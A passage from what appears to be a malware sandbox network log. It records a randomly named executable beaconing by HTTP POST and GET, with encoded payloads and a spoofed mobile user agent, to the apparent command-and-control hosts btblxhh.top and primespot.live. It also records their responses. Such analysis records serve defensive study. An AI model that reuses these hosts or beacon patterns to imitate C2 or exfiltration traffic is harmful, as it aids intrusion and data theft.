                                                                                                    Data Raw: 33 39 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 55 5b 8b 1c 45 14 7e 17 fc 0f 65 2f 86 19 e8 9d ae 5b df 76 ba 07 64 d5 a7 40 04 e3 83 8f bd d3 b5 33 a5 db dd 43 77 ed cc 2c 21 0f 42 40 10 23 fa 24 8a a2 78 c1 80 24 fa 20 28 9a e0 9f c9 ee ac 4f f9 0b 9e 53 35 33 d9 2c ea e6 c5 61 ba 4e 9d 4b 9d cb 57 55 a7 b2 97 5e bd b1 7f f3 ed 37 5e 23 53 53 1d 8d 5e 7c 21 db 52 55 94 c0 93 ac 52 a6 20 e3 69 d1 76 ca e4 de 5b 37 5f df 4d 3c 54 c0 cf e9 74 99 7b 73 ad 16 b3 a6 35 1e a9 8b 4a 5d e4 c7 4d 6d 54 0d 2b 17 ba 34 d3 bc 54 73 3d 56 bb 96 f1 2b 5d eb ea b8 da ed c6 c5 91 ca d9 80 fa 55 b1 bc 24 39 ee 54 6b 0d 8a 03 b0 a9 1b 8c 9d 19 6d 8e d4 e8 da 4e 22 87 d7 76 a2 18 86 98 c1 c0 a5 e4 21 50 c1 68 42 91 17 52 26 c8 f3 30 15 40 25 2a 23 1c ac da 0e 2c 4d e3 14 6d a2 58 88 61 16 38 d7 10 c3 d6 ed aa 79 57 9d 2c 9a b6 ec 3c b2 ad e6 7f 88 ed 05 58 da 85 b0 a5 ea c6 ad 9e 19 dd d4 cf 44 4e 53 86 25 47 21 15 98 f9 7f b3 57 40 74 09 8d 30 14 61 04 3e c3 98 49 c4 96 71 c4 95 51 8c 27 31 98 d3 a2 89 c4 21 75 09 [TRUNCATED]
                                                                                                    Data Ascii: 396U[E~e/[vd@3Cw,!B@#$x$ (OS53,aNKWU^7^#SS^|!RUR iv[7_M<Tt{s5J]MmT+4Ts=V+]U$9TkmN"v!PhBR&0@%*#,MmXa8yW,<XDNS%G!W@t0a>IqQ'1!uYbaL@X!mdnd[c09R*7) G4>X#a<QaC]>#E):{(pJa,zK0F9C6TwMuPt9U/lN!nFYpaVN)2v[9;;#}ixw_zzP~^R-oB^9e[e3>"$V>YoO;vuu?OW?}=<|1'3hVF-MN1/y!9yGP@hA2?c"?MSt FCkpqt"-V[x9:-[cFY3,=BUNtO,b/X@UZjv_Lar0K='a|Yd0e@xt1X;0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    14192.168.2.849727156.234.28.101805268C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Dec 3, 2024 14:16:57.568144083 CET831OUTPOST /dp9c/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.btblxhh.top
                                                                                                    Origin: http://www.btblxhh.top
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 227
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.btblxhh.top/dp9c/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Data Raw: 31 4a 67 48 6b 6c 3d 53 4b 38 69 41 4c 55 58 70 32 68 61 4b 50 68 35 75 38 6b 73 69 45 63 55 47 4a 6d 6b 63 58 48 47 54 54 67 6b 6a 44 4c 32 38 41 42 54 6a 79 33 4d 48 66 35 64 6c 6d 41 48 61 57 45 6c 6c 4d 6a 71 56 4c 48 76 76 6c 34 5a 74 4a 4c 42 64 46 43 34 64 70 36 63 4a 32 4c 51 44 51 59 37 4b 76 4c 51 58 6c 65 6e 63 63 61 46 46 64 6c 2b 51 33 54 51 5a 53 78 39 49 46 42 6b 56 76 4d 4a 59 65 34 56 34 4b 66 49 44 35 33 43 71 41 70 71 6a 37 64 67 34 39 42 6d 54 7a 69 63 6c 6e 35 61 7a 42 2f 56 75 4f 41 74 30 63 70 47 31 73 43 2f 43 31 36 53 6e 71 4c 41 58 38 45 38 78 5a 62 51 62 58 76 43 65 56 54 58 78 4c 53 58 52 74 6d 49 42 39 73 59 77 6b 78 4c 67 49 37 55 56 2f 33 36
                                                                                                    Data Ascii: 1JgHkl=SK8iALUXp2haKPh5u8ksiEcUGJmkcXHGTTgkjDL28ABTjy3MHf5dlmAHaWEllMjqVLHvvl4ZtJLBdFC4dp6cJ2LQDQY7KvLQXlenccaFFdl+Q3TQZSx9IFBkVvMJYe4V4KfID53CqApqj7dg49BmTzicln5azB/VuOAt0cpG1sC/C16SnqLAX8E8xZbQbXvCeVTXxLSXRtmIB9sYwkxLgI7UV/36
                                                                                                    Dec 3, 2024 14:16:59.136734009 CET1135INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Tue, 03 Dec 2024 13:16:58 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Vary: Accept-Encoding
                                                                                                    Content-Encoding: gzip
                                                                                                    Data Raw: 33 39 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 55 5b 8b 1c 45 14 7e 17 fc 0f 65 2f 86 19 e8 9d ae 5b df 76 ba 07 64 d5 a7 40 04 e3 83 8f bd d3 b5 33 a5 db dd 43 77 ed cc 2c 21 0f 42 40 10 23 fa 24 8a a2 78 c1 80 24 fa 20 28 9a e0 9f c9 ee ac 4f f9 0b 9e 53 35 33 d9 2c ea e6 c5 61 ba 4e 9d 4b 9d cb 57 55 a7 b2 97 5e bd b1 7f f3 ed 37 5e 23 53 53 1d 8d 5e 7c 21 db 52 55 94 c0 93 ac 52 a6 20 e3 69 d1 76 ca e4 de 5b 37 5f df 4d 3c 54 c0 cf e9 74 99 7b 73 ad 16 b3 a6 35 1e a9 8b 4a 5d e4 c7 4d 6d 54 0d 2b 17 ba 34 d3 bc 54 73 3d 56 bb 96 f1 2b 5d eb ea b8 da ed c6 c5 91 ca d9 80 fa 55 b1 bc 24 39 ee 54 6b 0d 8a 03 b0 a9 1b 8c 9d 19 6d 8e d4 e8 da 4e 22 87 d7 76 a2 18 86 98 c1 c0 a5 e4 21 50 c1 68 42 91 17 52 26 c8 f3 30 15 40 25 2a 23 1c ac da 0e 2c 4d e3 14 6d a2 58 88 61 16 38 d7 10 c3 d6 ed aa 79 57 9d 2c 9a b6 ec 3c b2 ad e6 7f 88 ed 05 58 da 85 b0 a5 ea c6 ad 9e 19 dd d4 cf 44 4e 53 86 25 47 21 15 98 f9 7f b3 57 40 74 09 8d 30 14 61 04 3e c3 98 49 c4 96 71 c4 95 51 8c 27 31 98 d3 a2 89 c4 21 75 09 [TRUNCATED]
                                                                                                    Data Ascii: 396U[E~e/[vd@3Cw,!B@#$x$ (OS53,aNKWU^7^#SS^|!RUR iv[7_M<Tt{s5J]MmT+4Ts=V+]U$9TkmN"v!PhBR&0@%*#,MmXa8yW,<XDNS%G!W@t0a>IqQ'1!uYbaL@X!mdnd[c09R*7) G4>X#a<QaC]>#E):{(pJa,zK0F9C6TwMuPt9U/lN!nFYpaVN)2v[9;;#}ixw_zzP~^R-oB^9e[e3>"$V>YoO;vuu?OW?}=<|1'3hVF-MN1/y!9yGP@hA2?c"?MSt FCkpqt"-V[x9:-[cFY3,=BUNtO,b/X@UZjv_Lar0K='a|Yd0e@xt1X;0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    15192.168.2.849728156.234.28.101805268C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Dec 3, 2024 14:17:00.226274014 CET1848OUTPOST /dp9c/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.btblxhh.top
                                                                                                    Origin: http://www.btblxhh.top
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 1243
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.btblxhh.top/dp9c/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Data Raw: 31 4a 67 48 6b 6c 3d 53 4b 38 69 41 4c 55 58 70 32 68 61 4b 50 68 35 75 38 6b 73 69 45 63 55 47 4a 6d 6b 63 58 48 47 54 54 67 6b 6a 44 4c 32 38 41 4a 54 6a 68 50 4d 48 38 52 64 6b 6d 41 48 5a 57 45 6b 6c 4d 6a 72 56 4c 76 6a 76 6c 31 6b 74 4c 7a 42 66 6a 65 34 62 59 36 63 44 32 4c 51 42 51 59 2b 4f 76 4c 46 58 6c 4f 5a 63 63 4b 46 46 64 6c 2b 51 33 2f 51 5a 42 70 39 4b 46 42 6e 63 50 4d 64 63 65 34 74 34 4b 6e 59 44 35 7a 30 72 77 4a 71 69 62 74 67 35 4c 31 6d 52 54 69 61 6f 48 35 53 7a 42 43 56 75 4f 73 70 30 63 64 38 31 72 32 2f 48 43 4c 65 33 34 32 44 4f 38 45 71 39 72 6d 78 55 46 72 47 61 6b 2f 32 38 4a 61 5a 51 6f 2b 61 50 39 56 53 33 48 55 6e 6a 4d 54 77 51 36 7a 7a 71 76 32 4e 62 78 4e 74 67 4e 6e 71 33 72 4b 76 32 54 61 79 77 55 65 6a 77 54 59 2b 4a 56 61 33 74 7a 78 44 70 53 63 71 4a 71 79 4d 4d 5a 61 62 31 77 4e 54 57 48 61 4b 61 55 46 4d 68 58 47 7a 43 65 76 61 43 47 33 6e 6c 66 55 4e 55 62 35 72 62 54 36 62 42 46 6e 53 71 55 2f 78 64 2f 45 4c 39 7a 47 76 44 30 39 54 57 68 77 57 6e 61 44 [TRUNCATED]
                                                                                                    Data Ascii: 1JgHkl=SK8iALUXp2haKPh5u8ksiEcUGJmkcXHGTTgkjDL28AJTjhPMH8RdkmAHZWEklMjrVLvjvl1ktLzBfje4bY6cD2LQBQY+OvLFXlOZccKFFdl+Q3/QZBp9KFBncPMdce4t4KnYD5z0rwJqibtg5L1mRTiaoH5SzBCVuOsp0cd81r2/HCLe342DO8Eq9rmxUFrGak/28JaZQo+aP9VS3HUnjMTwQ6zzqv2NbxNtgNnq3rKv2TaywUejwTY+JVa3tzxDpScqJqyMMZab1wNTWHaKaUFMhXGzCevaCG3nlfUNUb5rbT6bBFnSqU/xd/EL9zGvD09TWhwWnaD6QWjLDSmSq2iwMnrLElFWLiJRx5EaFjIDNYwxepz2h2P9N0gEzv6fTwqxzaAVUOiVHC4bWSoCHUuipKd8YwBmcHsJj8SjI3OG0yqvDhxPvde77HMu5WbvqmiP0TKP+tdbz74XJAc2oXIIEujw1GFpI0a8bz+WcL5jNeJxpnx37tEM2CVK7XN6ygNqGwFsHLbW+1ETJ32ygmr63+GWLJnA1C5VTBgm6F6rt33gWZux7lmO9+AGiuuhtgiuPOa2yNSbi6hbU63080+NJT786/paA4y9fU7myYnxDWsObxjEhpZb80Jw+qhbh88ovbb/Nl0PVk5qJOD3UznF4cGA4gN4pSS1for1uAMj/V1EAPm/bQlNZghc/GLXrBmL/516wIJtlKigKg7l5MGrU8akpIpmijMt6S0VdPrhZz19SxQcyNvxGVD0vXPHmPxDV4FT7JZCOy210aFuyoq7fvYvxisY85KSu367a3dmUywFgVwSyW/uuTY8TtVEdeqpjden7VopSgLCHu9/wJ965+4MNQNgJkYaSI/GubK8aG17OQzKXFxNjJFYOFVIyGboNbzZzo2VwelsPYLLENfXn5Tba6pCnQOdDAO5V+M3DN/p+BLhglZ4RRgZzcHUCRXE7bUCDkKpXd5eRpQdC6udqMy+Xs+xgCUeOD7q4xc00 [TRUNCATED]
                                                                                                    Dec 3, 2024 14:17:01.784885883 CET1135INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Tue, 03 Dec 2024 13:17:01 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Vary: Accept-Encoding
                                                                                                    Content-Encoding: gzip
                                                                                                    Data Raw: 33 39 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 55 5b 8b 1c 45 14 7e 17 fc 0f 65 2f 86 19 e8 9d ae 5b df 76 ba 07 64 d5 a7 40 04 e3 83 8f bd d3 b5 33 a5 db dd 43 77 ed cc 2c 21 0f 42 40 10 23 fa 24 8a a2 78 c1 80 24 fa 20 28 9a e0 9f c9 ee ac 4f f9 0b 9e 53 35 33 d9 2c ea e6 c5 61 ba 4e 9d 4b 9d cb 57 55 a7 b2 97 5e bd b1 7f f3 ed 37 5e 23 53 53 1d 8d 5e 7c 21 db 52 55 94 c0 93 ac 52 a6 20 e3 69 d1 76 ca e4 de 5b 37 5f df 4d 3c 54 c0 cf e9 74 99 7b 73 ad 16 b3 a6 35 1e a9 8b 4a 5d e4 c7 4d 6d 54 0d 2b 17 ba 34 d3 bc 54 73 3d 56 bb 96 f1 2b 5d eb ea b8 da ed c6 c5 91 ca d9 80 fa 55 b1 bc 24 39 ee 54 6b 0d 8a 03 b0 a9 1b 8c 9d 19 6d 8e d4 e8 da 4e 22 87 d7 76 a2 18 86 98 c1 c0 a5 e4 21 50 c1 68 42 91 17 52 26 c8 f3 30 15 40 25 2a 23 1c ac da 0e 2c 4d e3 14 6d a2 58 88 61 16 38 d7 10 c3 d6 ed aa 79 57 9d 2c 9a b6 ec 3c b2 ad e6 7f 88 ed 05 58 da 85 b0 a5 ea c6 ad 9e 19 dd d4 cf 44 4e 53 86 25 47 21 15 98 f9 7f b3 57 40 74 09 8d 30 14 61 04 3e c3 98 49 c4 96 71 c4 95 51 8c 27 31 98 d3 a2 89 c4 21 75 09 [TRUNCATED]
                                                                                                    Data Ascii: 396U[E~e/[vd@3Cw,!B@#$x$ (OS53,aNKWU^7^#SS^|!RUR iv[7_M<Tt{s5J]MmT+4Ts=V+]U$9TkmN"v!PhBR&0@%*#,MmXa8yW,<XDNS%G!W@t0a>IqQ'1!uYbaL@X!mdnd[c09R*7) G4>X#a<QaC]>#E):{(pJa,zK0F9C6TwMuPt9U/lN!nFYpaVN)2v[9;;#}ixw_zzP~^R-oB^9e[e3>"$V>YoO;vuu?OW?}=<|1'3hVF-MN1/y!9yGP@hA2?c"?MSt FCkpqt"-V[x9:-[cFY3,=BUNtO,b/X@UZjv_Lar0K='a|Yd0e@xt1X;0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    16192.168.2.849729156.234.28.101805268C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Dec 3, 2024 14:17:02.890991926 CET560OUTGET /dp9c/?1JgHkl=fIUCD8Yz2nphKcMxyO4tlSIcMJ/+EEeHC1g1rmDhwR9J1RiwCtlWpXo9Zxpli6GkENLWknkKup+McE28ApWDIV/QPDMFPo3/M02rRc2bBu1CVBDCQC56E21kZNcAcsBmiQ==&uZ9=wvL0WTq0tnld4P HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Host: www.btblxhh.top
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Dec 3, 2024 14:17:04.451384068 CET1236INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Tue, 03 Dec 2024 13:17:04 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Vary: Accept-Encoding
                                                                                                    Set-Cookie: _sessionsid=OTE2YzNjMjUwYmRjYjM5ODAwMzY0NTY3ZjQwMThkNjE=; path=/; expires=Tue, 10 Dec 2024 13:17:04 GMT
                                                                                                    Data Raw: 37 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 76 69 65 77 70 6f 72 74 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 38 34 3b 26 23 36 37 3b 26 23 37 31 3b 26 23 32 34 34 32 35 3b 26 23 33 31 30 38 30 3b 26 23 32 33 34 34 38 3b 26 23 33 32 35 39 33 3b 26 23 34 35 3b 26 23 36 35 3b 26 23 38 30 3b 26 23 38 30 3b 26 23 31 39 39 37 39 3b 26 23 33 36 37 33 33 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 38 34 3b 26 23 36 37 3b 26 23 37 31 3b 26 23 32 34 34 [TRUNCATED]
                                                                                                    Data Ascii: 71d<!DOCTYPE html><html><head> <meta charset="UTF-8"> <meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no"><title>&#84;&#67;&#71;&#24425;&#31080;&#23448;&#32593;&#45;&#65;&#80;&#80;&#19979;&#36733;</title><meta name="keywords" content="&#84;&#67;&#71;&#24425;&#31080;&#23448;&#32593;&#45;&#65;&#80;&#80;&#19979;&#36733;"/><meta name="description" content="&#9917;&#65039;&#9917;&#65039;&#9917;&#65039;&#84;&#67;&#71;&#24425;&#31080;&#65;&#80;&#80;&#55356;&#57144;&#121;&#107;&#49;&#56;&#56;&#46;&#99;&#99;&#9989;&#39030;&#32423;&#19979;&#27880;&#24179;&#21488;&#44;&#25552;&#20379;&#84;&#67;&#71;&#24425;&#31080;&#32593;&#31449;&#44;&#84;&#67;&#71;&#24425;&#31080;&#26368;&#26032;&#23448;&#32593;&#44;&#84;&#67;&#71;&#24425;&#31080;&#97;&#112;&#112;&#19979;&#36733;&#44;&#21508;&#31181;&#23089;&#20048;&#21697;&#31181;&#24212;&#26377;&#23613;&#26377;&#44
                                                                                                    Dec 3, 2024 14:17:04.451414108 CET895INData Raw: 3b 26 23 38 34 3b 26 23 36 37 3b 26 23 37 31 3b 26 23 32 34 34 32 35 3b 26 23 33 31 30 38 30 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 26 23 32 33 34 34 38 3b 26 23 32 36 30 34 31 3b 26 23 32 33 34 35 38 3b 26 23 32 36 33 38 31 3b 26 23
                                                                                                    Data Ascii: ;&#84;&#67;&#71;&#24425;&#31080;&#32593;&#31449;&#23448;&#26041;&#23458;&#26381;&#50;&#52;&#23567;&#26102;&#22312;&#32447;&#20026;&#24744;&#26381;&#21153;&#33;"/><script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){docu


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    17192.168.2.849730209.74.79.42805268C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Dec 3, 2024 14:17:10.043855906 CET820OUTPOST /b8eq/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.primespot.live
                                                                                                    Origin: http://www.primespot.live
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 207
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.primespot.live/b8eq/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Data Raw: 31 4a 67 48 6b 6c 3d 74 41 6d 59 64 78 47 65 4f 53 54 77 57 46 55 38 67 5a 74 39 41 31 72 52 4d 39 61 77 34 2b 62 75 38 49 69 65 75 6d 78 44 64 2f 44 31 38 41 55 32 56 6c 38 43 4b 6a 30 76 68 62 71 42 59 78 65 73 69 38 49 56 77 46 6e 46 39 65 68 6a 66 71 39 74 66 75 53 42 50 42 77 56 4c 6f 67 51 65 45 58 77 6b 56 72 64 72 6e 35 47 41 6c 57 4f 48 76 42 49 49 35 79 58 75 4f 68 33 73 43 74 57 45 79 45 56 64 37 58 34 50 63 6f 66 52 53 65 32 4d 30 52 77 35 31 6f 43 72 73 69 53 64 6c 4c 56 52 46 65 31 7a 56 34 72 52 34 35 7a 66 55 38 46 66 36 41 4e 34 73 7a 6e 57 56 74 68 64 4a 43 47 65 4e 63 72 49 6e 6b 4f 39 71 55 3d
                                                                                                    Data Ascii: 1JgHkl=tAmYdxGeOSTwWFU8gZt9A1rRM9aw4+bu8IieumxDd/D18AU2Vl8CKj0vhbqBYxesi8IVwFnF9ehjfq9tfuSBPBwVLogQeEXwkVrdrn5GAlWOHvBII5yXuOh3sCtWEyEVd7X4PcofRSe2M0Rw51oCrsiSdlLVRFe1zV4rR45zfU8Ff6AN4sznWVthdJCGeNcrInkO9qU=
                                                                                                    Dec 3, 2024 14:17:11.301911116 CET533INHTTP/1.1 404 Not Found
                                                                                                    Date: Tue, 03 Dec 2024 13:17:11 GMT
                                                                                                    Server: Apache
                                                                                                    Content-Length: 389
                                                                                                    Connection: close
                                                                                                    Content-Type: text/html
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    18192.168.2.849731209.74.79.42805268C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Dec 3, 2024 14:17:12.707151890 CET840OUTPOST /b8eq/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.primespot.live
                                                                                                    Origin: http://www.primespot.live
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 227
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.primespot.live/b8eq/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Data Raw: 31 4a 67 48 6b 6c 3d 74 41 6d 59 64 78 47 65 4f 53 54 77 55 6c 45 38 69 2b 35 39 48 56 72 65 51 4e 61 77 74 4f 62 31 38 49 65 65 75 6e 31 70 63 4d 72 31 39 69 63 32 45 58 55 43 4c 6a 30 76 70 37 71 45 63 78 65 72 69 38 46 71 77 45 4c 46 39 65 31 6a 66 76 35 74 66 2f 53 43 4f 52 77 58 45 49 67 65 41 30 58 77 6b 56 72 64 72 6a 6f 72 41 6c 4f 4f 62 50 78 49 4a 59 79 51 78 2b 68 30 34 53 74 57 50 53 45 52 64 37 57 76 50 64 6b 78 52 52 71 32 4d 78 74 77 2b 6b 6f 42 67 73 69 63 5a 6c 4b 79 43 47 36 37 70 6c 59 77 4e 72 52 6e 51 45 30 71 61 4d 78 6e 69 4f 37 68 56 56 46 4b 64 4b 71 77 62 36 42 44 53 45 30 2b 6a 39 42 4a 6a 7a 39 7a 32 44 61 55 30 2b 2b 72 2b 2f 69 4e 78 38 6c 31
                                                                                                    Data Ascii: 1JgHkl=tAmYdxGeOSTwUlE8i+59HVreQNawtOb18Ieeun1pcMr19ic2EXUCLj0vp7qEcxeri8FqwELF9e1jfv5tf/SCORwXEIgeA0XwkVrdrjorAlOObPxIJYyQx+h04StWPSERd7WvPdkxRRq2Mxtw+koBgsicZlKyCG67plYwNrRnQE0qaMxniO7hVVFKdKqwb6BDSE0+j9BJjz9z2DaU0++r+/iNx8l1
                                                                                                    Dec 3, 2024 14:17:13.915189028 CET533INHTTP/1.1 404 Not Found
                                                                                                    Date: Tue, 03 Dec 2024 13:17:13 GMT
                                                                                                    Server: Apache
                                                                                                    Content-Length: 389
                                                                                                    Connection: close
                                                                                                    Content-Type: text/html
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 